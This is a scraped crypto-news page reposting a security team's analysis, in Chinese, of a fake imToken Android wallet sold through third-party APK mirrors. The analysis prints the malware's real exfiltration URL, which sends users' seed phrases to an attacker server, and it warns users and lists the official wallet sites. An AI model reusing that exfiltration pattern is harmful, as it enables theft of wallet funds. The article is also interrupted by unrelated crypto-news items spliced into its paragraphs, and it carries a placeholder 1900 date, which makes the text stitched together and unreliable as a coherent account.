買以太坊 買以太坊
Ctrl+D 買以太坊
ads

WEB:Web3 假錢包第三方源調查分析:如何甄別網絡釣魚攻擊?_Geo Web

Author:

Time:1900/1/1 0:00:00

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

轉自:ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

香港 Web3.0 協會成立典禮正式開幕:4月11日消息,香港 Web3.0 協會成立典禮正式開幕并在線上進行同步直播,典禮議程包括理事會會長及主禮嘉賓致辭、協會主要成員委任儀式、高峰論壇等議程,出席嘉賓包括香港特別行政區行政長官李家超、香港立法會主席梁君彥、香港保安局長鄧炳強等。

香港 Web3.0 協會是跨業界和非牟利的機構,旨在響應國家和香港特區政府的號召,促進香港數碼新世界 Web3.0“第三代互聯網”生態環境的建設。協會致力推動技術變革和產業升級,為業界創立產業標準。[2023/4/11 13:56:47]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

Web3基礎設施提供商Caldera宣布SevenX Ventures為種子輪融資參投方:4月10日消息,Web3基礎設施提供商Caldera發推稱,今年2月曾公布種子輪融資消息,SevenX Ventures也是種子輪融資的參投方。

據此前報道,今年2月,Caldera宣布在兩輪融資中共籌集900萬美元,分別由紅杉資本和Dragonfly Capital領投,Neo、1kx和Ethereal Ventures以及其他天使投資人參投,資金將用于招聘、合作和整合。

據悉,Caldera支持所有用戶啟動和運行專用的、高性能的第二層區塊鏈Rollup,并運行輕量級的、高度可定制的區塊鏈,同時共享以太坊的安全性。通過為每個應用程序提供自己的“應用程序Rollup”,Caldera稱其為應用程序交易提供專用通道,從而降低交易成本,并使其降低費用高峰和網絡中斷的風險。[2023/4/10 13:54:00]

網站分析

印度2022年推出的5大創投基金中2家涉足Web3:金色財經報道,根據Inc42的一項調查顯示,印度2022年推出的5大創投基金中2家涉足Web3,分別是Elevation Capital旗下規模達6.7億美元的Fund VIII,該基金是Polygon的投資方,以及Accel旗下規模達6.5億美元的Accel India VII,該基金參投了Atoms的pre-seed輪融資。(Inc42)[2023/1/1 22:19:33]

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?

我們先看下apkcombo的流量有多大:

Web3電子郵件平臺Mailchain已支持用戶向任一ENS或地址發送消息:12月15日消息,Web3電子郵件平臺Mailchain已支持用戶在注冊后鏈接Web3錢包,向任一ENS或區塊鏈地址發送和接收私人電子郵件消息,且只有收件人才能解密郵件。

此前報道,9月份Mailchain完成460萬美元種子輪融資,Crane Venture Partners和Kenetic Capital領投。[2022/12/15 21:46:24]

據數據統計站點similarweb統計,apkcombo站點:

全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

Web3訂閱和支付平臺Suberra已融資270萬美元:金色財經報道,Web3訂閱和支付平臺Suberra已融資270萬美元,Spartan Capital、Delphi Digital、Hashed、Newman Capital、Defiance Capital、Arcane Group和Tsing Tech Ventures等參投。

Suberra正在構建一個加密貨幣支付平臺,供企業以快速簡便的方式在全球范圍內接受自動定期訂閱和一次性加密貨幣支付。它可以與現有的網絡應用程序集成在一起,并允許企業在信用卡之外接受加密貨幣。募集的資金將用于啟動商家平臺并推動Suberra下一階段的發展,包括加速增長、擴大運營和擴大團隊,訂閱產品將于2022年第四季度推出。[2022/10/7 18:41:23]

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags:WEBWEB3COMKENGeo Webweb3游戲項目價值排名COMOS FinancevEmpire Game Token

POL幣最新價格
NOS:為什么比特幣(BTC)再次突破30,000美元?_OST

比特幣今天再次突破了30,000美元的支撐位。BTC的價值在過去24小時內也上漲了9%。BTC從27,217美元的24小時低點上漲至30,000美元,然后跌至當前價格29,903美元.

1900/1/1 0:00:00
Gate.io:關于非首發項目Treecle (TRCL)空投結果_trc幣怎么購買

1.關于非首發項目Treecle(TRCL)空投結果Gate.ioStartup首發項目Treecle代幣TRCL于Apr26th,AM03:00開始下單,24小時內下單同等對待,總共有22.

1900/1/1 0:00:00
BTC:市場恐慌,拋壓還在,反彈上車即爆跌!_比特幣

到美股開盤后,延續了盤前的走勢,仍然不夠理想,即便不看消息面,單純看三大股指期貨的走勢就知道目前主流風險市場的投資者情緒了.

1900/1/1 0:00:00
LEX:Bitfinex Alpha:美國經濟降溫跡象顯露,但比特幣長期情緒仍然積極_Rabbit Finance

4月25日消息,在一年的加息打擊下,美國經濟降溫的跡象終于開始顯現。3月份美國新屋開工數下跌0.8%。美國就業市場顯示出持續降溫的跡象,申請失業救濟人數有史以來首次連續三周上升.

1900/1/1 0:00:00
比特幣:4季度到明年的減半行情值得期待。23年還有哪些敘事值得關注_Credefi

公眾號:小七財圈 2022年Crypto行業是非常慘痛的一年,甚至是歷史上爆雷金額最大的一年,不管是從一開始的中國小交易所,像虎符、AEX到Terra引起巨大的震動.

1900/1/1 0:00:00
加密貨幣:分析師為比特幣價格制定更高目標,并預測INJ價格將上漲15%_NINJA INU

故事亮點比特幣價格反彈良好,目標是達到28,800美元的關鍵阻力位,以保持看漲勢頭。在市場參與者等待看漲推動的同時,牛市陷阱的可能性也浮出水面。在受到幾天的看跌影響后,加密貨幣市場已經開始復蘇.

1900/1/1 0:00:00
ads